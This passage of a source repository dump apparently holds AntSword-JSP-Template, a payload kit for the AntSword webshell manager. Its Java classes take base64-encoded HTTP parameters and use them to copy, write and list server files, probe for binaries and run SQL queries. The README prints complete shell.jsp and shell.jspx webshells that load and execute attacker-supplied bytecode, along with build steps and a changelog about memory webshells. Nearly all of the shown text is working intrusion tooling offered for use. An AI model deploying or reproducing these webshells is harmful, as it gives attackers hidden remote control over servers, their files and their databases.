122 | Class clazz = Class.forName("java.util.Base64");
123 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
124 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
125 | } else {
126 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
127 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
128 | }
129 | return bt;
130 | } catch (Exception e) {
131 | return new byte[]{};
132 | }
133 | }
134 | }
135 |
--------------------------------------------------------------------------------
/src/filemanager/Copy.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.lang.reflect.Field;
7 |
8 | public class Copy {
9 | public Object request = null;
10 | public Object response = null;
11 | public String encoder = "base64";
12 | public String cs = "antswordCharset";
13 | public String randomPrefix = "antswordrandomPrefix";
14 | public String decoderClassdata;
15 |
16 | @Override
17 | public boolean equals(Object obj) {
18 | this.parseObj(obj);
19 | StringBuffer output = new StringBuffer();
20 | String tag_s = "->|";
21 | String tag_e = "|<-";
22 | String varkey1 = "antswordargpath";
23 | String varkey2 = "antswordargtarget";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(CopyFileOrDirCode(z1, z2));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
60 | File sf = new File(sourceFilePath), df = new File(targetFilePath);
61 | if (sf.isDirectory()) {
62 | if (!df.exists()) {
63 | df.mkdir();
64 | }
65 | File[] z = sf.listFiles();
66 | for (int j = 0; j < z.length; j++) {
67 | CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
68 | }
69 | } else {
70 | FileInputStream is = new FileInputStream(sf);
71 | FileOutputStream os = new FileOutputStream(df);
72 | int n;
73 | byte[] b = new byte[1024];
74 | while ((n = is.read(b, 0, 1024)) != -1) {
75 | os.write(b, 0, n);
76 | }
77 | is.close();
78 | os.close();
79 | }
80 | return "1";
81 | }
82 |
83 | public void parseObj(Object obj) {
84 | if (obj.getClass().isArray()) {
85 | Object[] data = (Object[]) obj;
86 | request = data[0];
87 | response = data[1];
88 | } else {
89 | try {
90 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
91 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
92 | } catch (Exception e) {
93 | request = obj;
94 | try {
95 | Field req = request.getClass().getDeclaredField("request");
96 | req.setAccessible(true);
97 | Object request2 = req.get(request);
98 | Field resp = request2.getClass().getDeclaredField("response");
99 | resp.setAccessible(true);
100 | response = resp.get(request2);
101 | } catch (Exception ex) {
102 | try {
103 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
104 | } catch (Exception ignored) {
105 |
106 | }
107 | }
108 | }
109 | }
110 | }
111 |
112 | public String asoutput(String str) {
113 | try {
114 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
115 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
116 | defineClassMethod.setAccessible(true);
117 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
118 | return cc.getConstructor(String.class).newInstance(str).toString();
119 | } catch (Exception e) {
120 | return str;
121 | }
122 | }
123 |
124 | public byte[] Base64DecodeToByte(String str) {
125 | byte[] bt = null;
126 | String version = System.getProperty("java.version");
127 | try {
128 | if (version.compareTo("1.9") >= 0) {
129 | Class clazz = Class.forName("java.util.Base64");
130 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
131 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
132 | } else {
133 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
134 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
135 | }
136 | return bt;
137 | } catch (Exception e) {
138 | return new byte[]{};
139 | }
140 | }
141 | }
142 |
--------------------------------------------------------------------------------
/src/command/Listcmd.java:
--------------------------------------------------------------------------------
1 | package command;
2 |
3 | import java.io.ByteArrayOutputStream;
4 | import java.io.File;
5 | import java.lang.reflect.Field;
6 |
7 | public class Listcmd {
8 | public Object request = null;
9 | public Object response = null;
10 | public String encoder = "base64";
11 | public String cs = "antswordCharset";
12 | public String randomPrefix = "antswordrandomPrefix";
13 | public String decoderClassdata;
14 |
15 | @Override
16 | public boolean equals(Object obj) {
17 | this.parseObj(obj);
18 | StringBuffer output = new StringBuffer();
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargbinarr";
22 | String varkeydecoder = "antswordargdecoder";
23 | try {
24 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
25 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
26 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
27 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
28 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
29 | output.append(ListcmdCode(z1));
30 | } catch (Exception e) {
31 | output.append("ERROR:// " + e);
32 | }
33 | try {
34 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
35 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
36 | } catch (Exception ignored) {
37 | }
38 | return true;
39 | }
40 |
41 |
42 | String decode(String str) throws Exception {
43 | int prefixlen = 0;
44 | try {
45 | prefixlen = Integer.parseInt(randomPrefix);
46 | str = str.substring(prefixlen);
47 | } catch (Exception e) {
48 | prefixlen = 0;
49 | }
50 | if (encoder.equals("hex")) {
51 | if (str == null || str.equals("")) {
52 | return "";
53 | }
54 | String hexString = "0123456789ABCDEF";
55 | str = str.toUpperCase();
56 | ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2);
57 | String ss = "";
58 | for (int i = 0; i < str.length(); i += 2) {
59 | ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
60 | baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
61 | }
62 | return baos.toString(cs);
63 | } else if (encoder.equals("base64")) {
64 | return new String(this.Base64DecodeToByte(str), this.cs);
65 | }
66 | return str;
67 | }
68 |
69 | String ListcmdCode(String binarrstr) {
70 | String[] binarr = binarrstr.split(",");
71 | String ret = "";
72 | for (int i = 0; i < binarr.length; i++) {
73 | File f = new File(binarr[i]);
74 | if (f.exists() && !f.isDirectory()) {
75 | ret += binarr[i] + "\t1\n";
76 | } else {
77 | ret += binarr[i] + "\t0\n";
78 | }
79 | }
80 | return ret;
81 | }
82 |
83 | public void parseObj(Object obj) {
84 | if (obj.getClass().isArray()) {
85 | Object[] data = (Object[]) obj;
86 | request = data[0];
87 | response = data[1];
88 | } else {
89 | try {
90 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
91 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
92 | } catch (Exception e) {
93 | request = obj;
94 | try {
95 | Field req = request.getClass().getDeclaredField("request");
96 | req.setAccessible(true);
97 | Object request2 = req.get(request);
98 | Field resp = request2.getClass().getDeclaredField("response");
99 | resp.setAccessible(true);
100 | response = resp.get(request2);
101 | } catch (Exception ex) {
102 | try {
103 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
104 | } catch (Exception ignored) {
105 |
106 | }
107 | }
108 | }
109 | }
110 | }
111 |
112 | public String asoutput(String str) {
113 | try {
114 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
115 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
116 | defineClassMethod.setAccessible(true);
117 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
118 | return cc.getConstructor(String.class).newInstance(str).toString();
119 | } catch (Exception e) {
120 | return str;
121 | }
122 | }
123 |
124 | public byte[] Base64DecodeToByte(String str) {
125 | byte[] bt = null;
126 | String version = System.getProperty("java.version");
127 | try {
128 | if (version.compareTo("1.9") >= 0) {
129 | Class clazz = Class.forName("java.util.Base64");
130 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
131 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
132 | } else {
133 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
134 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
135 | }
136 | return bt;
137 | } catch (Exception e) {
138 | return new byte[]{};
139 | }
140 | }
141 | }
142 |
--------------------------------------------------------------------------------
/src/filemanager/Create_file.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.io.FileOutputStream;
5 | import java.lang.reflect.Field;
6 |
7 | public class Create_file {
8 | public Object request = null;
9 | public Object response = null;
10 | public String encoder = "base64";
11 | public String cs = "antswordCharset";
12 | public String randomPrefix = "antswordrandomPrefix";
13 | public String decoderClassdata;
14 |
15 | @Override
16 | public boolean equals(Object obj) {
17 | this.parseObj(obj);
18 | StringBuffer output = new StringBuffer();
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargpath";
22 | String varkey2 = "antswordargcontent";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
32 | output.append(WriteFileCode(z1, z2));
33 | } catch (Exception e) {
34 | output.append("ERROR:// " + e);
35 | }
36 | try {
37 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
38 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
39 | } catch (Exception ignored) {
40 | }
41 | return true;
42 | }
43 |
44 | String decode(String str) throws Exception {
45 | int prefixlen = 0;
46 | try {
47 | prefixlen = Integer.parseInt(randomPrefix);
48 | str = str.substring(prefixlen);
49 | } catch (Exception e) {
50 | prefixlen = 0;
51 | }
52 | if (encoder.equals("base64")) {
53 | return new String(this.Base64DecodeToByte(str), this.cs);
54 | }
55 | return str;
56 | }
57 |
58 | String WriteFileCode(String filePath, String fileContext) throws Exception {
59 | String h = "0123456789ABCDEF";
60 | String fileHexContext = strtohexstr(fileContext);
61 | File f = new File(filePath);
62 | FileOutputStream os = new FileOutputStream(f);
63 | for (int i = 0; i < fileHexContext.length(); i += 2) {
64 | os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
65 | }
66 | os.close();
67 | return "1";
68 | }
69 |
70 | String strtohexstr(String fileContext) throws Exception {
71 | String h = "0123456789ABCDEF";
72 | byte[] bytes = fileContext.getBytes(cs);
73 | StringBuilder sb = new StringBuilder(bytes.length * 2);
74 | for (int i = 0; i < bytes.length; i++) {
75 | sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
76 | sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
77 | }
78 | return sb.toString();
79 | }
80 |
81 | public void parseObj(Object obj) {
82 | if (obj.getClass().isArray()) {
83 | Object[] data = (Object[]) obj;
84 | request = data[0];
85 | response = data[1];
86 | } else {
87 | try {
88 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
89 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
90 | } catch (Exception e) {
91 | request = obj;
92 | try {
93 | Field req = request.getClass().getDeclaredField("request");
94 | req.setAccessible(true);
95 | Object request2 = req.get(request);
96 | Field resp = request2.getClass().getDeclaredField("response");
97 | resp.setAccessible(true);
98 | response = resp.get(request2);
99 | } catch (Exception ex) {
100 | try {
101 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
102 | } catch (Exception ignored) {
103 |
104 | }
105 | }
106 | }
107 | }
108 | }
109 |
110 | public String asoutput(String str) {
111 | try {
112 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
113 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
114 | defineClassMethod.setAccessible(true);
115 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
116 | return cc.getConstructor(String.class).newInstance(str).toString();
117 | } catch (Exception e) {
118 | return str;
119 | }
120 | }
121 |
122 | public byte[] Base64DecodeToByte(String str) {
123 | byte[] bt = null;
124 | String version = System.getProperty("java.version");
125 | try {
126 | if (version.compareTo("1.9") >= 0) {
127 | Class clazz = Class.forName("java.util.Base64");
128 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
129 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
130 | } else {
131 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
132 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
133 | }
134 | return bt;
135 | } catch (Exception e) {
136 | return new byte[]{};
137 | }
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/src/filemanager/Dir.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 | import java.nio.charset.Charset;
6 | import java.text.SimpleDateFormat;
7 |
8 |
9 | public class Dir {
10 | public Object request = null;
11 | public Object response = null;
12 | public String encoder = "base64";
13 | public String cs = "antswordCharset";
14 | public String randomPrefix = "antswordrandomPrefix";
15 | public String decoderClassdata;
16 |
17 | @Override
18 | public boolean equals(Object obj) {
19 | this.parseObj(obj);
20 | cs = String.valueOf(Charset.forName(System.getProperty("sun.jnu.encoding")));
21 | StringBuffer output = new StringBuffer();
22 | String tag_s = "->|";
23 | String tag_e = "|<-";
24 | String varkey1 = "antswordargpath";
25 | String varkeydecoder = "antswordargdecoder";
26 |
27 | try {
28 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
29 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
30 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
31 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(FileTreeCode(z1));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | public String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | public String FileTreeCode(String dirPath) throws Exception {
60 | File oF = new File(dirPath);
61 | File[] l = oF.listFiles();
62 | String s = "", sT, sQ, sF = "";
63 | java.util.Date dt;
64 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
65 | for (int i = 0; i < l.length; i++) {
66 | dt = new java.util.Date(l[i].lastModified());
67 | sT = fm.format(dt);
68 |
69 | sQ = l[i].canRead() ? "R" : "-";
70 | sQ += l[i].canWrite() ? "W" : "-";
71 | try {
72 | sQ += ((Boolean) l[i].getClass().getMethod("canExecute").invoke(l[i])) ? "X" : "-";
73 | } catch (Exception e) {
74 | sQ += "-";
75 | }
76 | String nm = l[i].getName();
77 | if (l[i].isDirectory()) {
78 | s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
79 | } else {
80 | sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
81 | }
82 | }
83 | s += sF;
84 | return s;
85 | }
86 |
87 | public void parseObj(Object obj) {
88 | if (obj.getClass().isArray()) {
89 | Object[] data = (Object[]) obj;
90 | request = data[0];
91 | response = data[1];
92 | } else {
93 | try {
94 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
95 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
96 | } catch (Exception e) {
97 | request = obj;
98 | try {
99 | Field req = request.getClass().getDeclaredField("request");
100 | req.setAccessible(true);
101 | Object request2 = req.get(request);
102 | Field resp = request2.getClass().getDeclaredField("response");
103 | resp.setAccessible(true);
104 | response = resp.get(request2);
105 | } catch (Exception ex) {
106 | try {
107 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
108 | } catch (Exception ignored) {
109 |
110 | }
111 | }
112 | }
113 | }
114 | }
115 |
116 | public String asoutput(String str) {
117 | try {
118 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
119 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
120 | defineClassMethod.setAccessible(true);
121 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
122 | return cc.getConstructor(String.class).newInstance(str).toString();
123 | } catch (Exception e) {
124 | return str;
125 | }
126 | }
127 |
128 | public byte[] Base64DecodeToByte(String str) {
129 | byte[] bt = null;
130 | String version = System.getProperty("java.version");
131 | try {
132 | if (version.compareTo("1.9") >= 0) {
133 | Class clazz = Class.forName("java.util.Base64");
134 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
135 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
136 | } else {
137 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
138 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
139 | }
140 | return bt;
141 | } catch (Exception e) {
142 | return new byte[]{};
143 | }
144 | }
145 | }
146 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AntSword-JSP-Template v1.7
2 |
3 | 中国蚁剑JSP一句话Payload
4 |
5 | 详细介绍:https://yzddmr6.tk/posts/antsword-diy-3/
6 |
7 | 编译环境:jdk1.5
8 |
9 | 适用范围:jdk>=1.5
10 |
11 | ## 编译
12 |
13 | ### 手动编译
14 |
15 | * Windows
16 |
17 | ```
18 | javac.exe Test.java
19 |
20 | base64 -w 0 Test.class > Test.txt
21 | ```
22 |
23 | * Linux/Mac
24 |
25 | ```bash
26 | javac Test.java
27 |
28 | # Linux
29 | base64 -w 0 Test.class > Test.txt
30 |
31 | # Mac
32 | base64 -b 0 Test.class > Test.txt
33 | ```
34 |
35 | ### 自动编译
36 |
37 | 在build.py中替换你的javac路径后运行,即可在`./dist`目录下自动生成代码模板。
38 |
39 | ```
40 | #python2
41 | python build.py
42 |
43 | #python3
44 | python3 build3.py
45 | ```
46 |
47 | 编译完成后将`./dist/`目录下所有文件拷贝至`antSword-master/source/core/jsp/template/`下即可
48 |
49 | ## Shell
50 | shell.jsp
51 |
52 | ```
53 | <%!
54 | class U extends ClassLoader {
55 | U(ClassLoader c) {
56 | super(c);
57 | }
58 | public Class g(byte[] b) {
59 | return super.defineClass(b, 0, b.length);
60 | }
61 | }
62 |
63 | public byte[] base64Decode(String str) throws Exception {
64 | Class base64;
65 | byte[] value = null;
66 | try {
67 | base64=Class.forName("sun.misc.BASE64Decoder");
68 | Object decoder = base64.newInstance();
69 | value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
70 | } catch (Exception e) {
71 | try {
72 | base64=Class.forName("java.util.Base64");
73 | Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
74 | value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
75 | } catch (Exception ee) {}
76 | }
77 | return value;
78 | }
79 | %>
80 | <%
81 | String cls = request.getParameter("ant");
82 | if (cls != null) {
83 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
84 | }
85 | %>
86 | ```
87 |
88 | shell.jspx
89 | ```
90 |
91 |
92 | class U extends ClassLoader {
93 | U(ClassLoader c) {
94 | super(c);
95 | }
96 | public Class g(byte[] b) {
97 | return super.defineClass(b, 0, b.length);
98 | }
99 | }
100 | public byte[] base64Decode(String str) throws Exception {
101 | Class base64;
102 | byte[] value = null;
103 | try {
104 | base64=Class.forName("sun.misc.BASE64Decoder");
105 | Object decoder = base64.newInstance();
106 | value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
107 | } catch (Exception e) {
108 | try {
109 | base64=Class.forName("java.util.Base64");
110 | Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
111 | value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
112 | } catch (Exception ee) {}
113 | }
114 | return value;
115 | }
116 |
117 |
118 | String cls = request.getParameter("ant");
119 | if (cls != null) {
120 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
121 | }
122 |
123 |
124 | ```
125 | 其中
126 |
127 | `new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});`
128 |
129 | 可以替换为
130 |
131 | `new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);`
132 |
133 | 这种写法支持Tomcat/Weblogic,不支持如SpringBoot等不自带pageContext的容器。
134 |
135 | 或者
136 |
137 | `new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);`
138 |
139 | 这种写法支持Tomcat/SpringBoot/Weblogic等容器。原理是使用反射自动从request中提取出response,遇到比较特殊的容器可能会提取失败。
140 |
141 | 后两种为不推荐的写法,可能会在未来移除。
142 |
143 | ## 解码器
144 |
145 | 以 Reverse 解码器为例说明:
146 |
147 | > 该解码器的功能是将返回包的数据反转
148 |
149 | 1. 编写 `AsoutputReverse.java` 内容如下:
150 |
151 | ```java
152 | public class AsoutputReverse {
153 | String res;
154 |
155 | public AsoutputReverse(String str) {
156 | // 这里编写对 str 处理的逻辑, 最后将值传给 res
157 | res = new StringBuffer(str).reverse().toString();
158 | }
159 |
160 | // 请保持 toString 方法, 不要修改内容
161 | @Override
162 | public String toString() {
163 | return res;
164 | }
165 | }
166 | ```
167 |
168 | 2. 编译,并获取 .class 文件 base64 后的内容
169 |
170 | ```
171 | $ javac AsoutputReverse.java
172 | $ base64 -w 0 AsoutputReverse.class
173 | ```
174 |
175 | 3. 打开 AntSword 进入编码设置,创建「解码器」,内容如下:
176 |
177 | ```
178 | /**
179 | * JSP::reverse 解码器
180 | */
181 |
182 | 'use strict';
183 |
184 | module.exports = {
185 | asoutput: () => {
186 | // 这里是你的 .class 文件的 base64 后的内容
187 | return `yv66vgAAADMAHgoACAATBwAUCgACABUKAAIAFgoAAgAXCQAHABgHA...`;
188 | },
189 | decode_buff: (data) => {
190 | // 这里是解返回包的逻辑
191 | return Buffer.from(data).reverse();
192 | }
193 | }
194 | ```
195 |
196 | ## 更新日志
197 |
198 | ### v 1.7
199 |
200 | 1. 修复mysql表名含有特殊字符时出错的问题
201 | 2. 增加文件hash功能
202 | 3. 支持Tomcat10,去掉对第三方库的依赖
203 |
204 | ### v 1.6
205 |
206 |
207 | 1. equals支持数组传参方式,兼容各种容器
208 | 2. build.py中可以手动指定版本号编译,不再需要下载指定jdk
209 | 3. 部分变量转为类属性,方便调试
210 | 4. 修正 insert/update/delete 语句无法执行问题
211 |
212 | ### v 1.5
213 |
214 | 1. 支持解码器(返回包加密)
215 | 2. 修复base64编码问题&改正错别字
216 | 3. 修改获取当前目录的方式
217 | 4. 兼容 JDK 1.5
218 |
219 | ### v 1.4
220 |
221 | 1. 兼容JDK6
222 | 2. 兼容weblogic内存webshell
223 | 3. 优化报错信息
224 | 4. 解决windows下中文乱码的问题(win选择GBK编码,linux选择UTF-8编码)
225 | 5. 实战中只能获取到response的情况几乎没有,所以为了减少payload体积不再支持response作为入口参数
226 | 6. 增加用于测试payload的Web项目
227 | 7. 修复 java -jar xxx.war 启动时当前目录获取失败的问题
228 |
229 |
230 | ### v 1.3
231 |
232 | 1. 兼容SpringBoot
233 |
234 | ### v 1.2
235 |
236 | 1. 修复下载文件的BUG
237 | 2. database添加Base64编码
238 |
239 | ### v 1.1
240 |
241 | 1. 增加对Tomcat内存Webshell的兼容
242 | 2. 兼容高版本JDK(JDK7-14)
243 |
244 | ### v 1.0
245 |
246 | 1. release
247 |
--------------------------------------------------------------------------------
/src/database/mysql/Show_databases.java:
--------------------------------------------------------------------------------
1 | package database.mysql;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_databases {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkeydecoder = "antswordargdecoder";
23 | try {
24 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
25 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
26 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
27 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
28 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
29 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
30 | output.append(showDatabases(z1, z2));
31 | } catch (Exception e) {
32 | output.append("ERROR:// " + e);
33 | }
34 | try {
35 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
36 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
37 | } catch (Exception ignored) {
38 | }
39 | return true;
40 | }
41 |
42 | String decode(String str) throws Exception {
43 | int prefixlen = 0;
44 | try {
45 | prefixlen = Integer.parseInt(randomPrefix);
46 | str = str.substring(prefixlen);
47 | } catch (Exception e) {
48 | prefixlen = 0;
49 | }
50 | if (encoder.equals("base64")) {
51 | return new String(this.Base64DecodeToByte(str), this.cs);
52 | }
53 | return str;
54 | }
55 |
56 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
57 | throws Exception {
58 | String ret = "";
59 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
60 | Class.forName(x[0].trim());
61 | String url = x[1] + "&characterEncoding=" + encode;
62 | Connection c = DriverManager.getConnection(url);
63 | Statement stmt = c.createStatement();
64 | ResultSet rs = stmt.executeQuery(sql);
65 | ResultSetMetaData rsmd = rs.getMetaData();
66 |
67 | if (needcoluname) {
68 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
69 | String columnName = rsmd.getColumnName(i);
70 | ret += columnName + columnsep;
71 | }
72 | ret += rowsep;
73 | }
74 |
75 | while (rs.next()) {
76 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
77 | String columnValue = rs.getString(i);
78 | ret += columnValue + columnsep;
79 | }
80 | ret += rowsep;
81 | }
82 | return ret;
83 | }
84 |
85 | String showDatabases(String encode, String conn) throws Exception {
86 | String sql = "show databases";
87 | String columnsep = "\t";
88 | String rowsep = "";
89 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
90 | }
91 |
92 | public void parseObj(Object obj) {
93 | if (obj.getClass().isArray()) {
94 | Object[] data = (Object[]) obj;
95 | request = data[0];
96 | response = data[1];
97 | } else {
98 | try {
99 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
100 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
101 | } catch (Exception e) {
102 | request = obj;
103 | try {
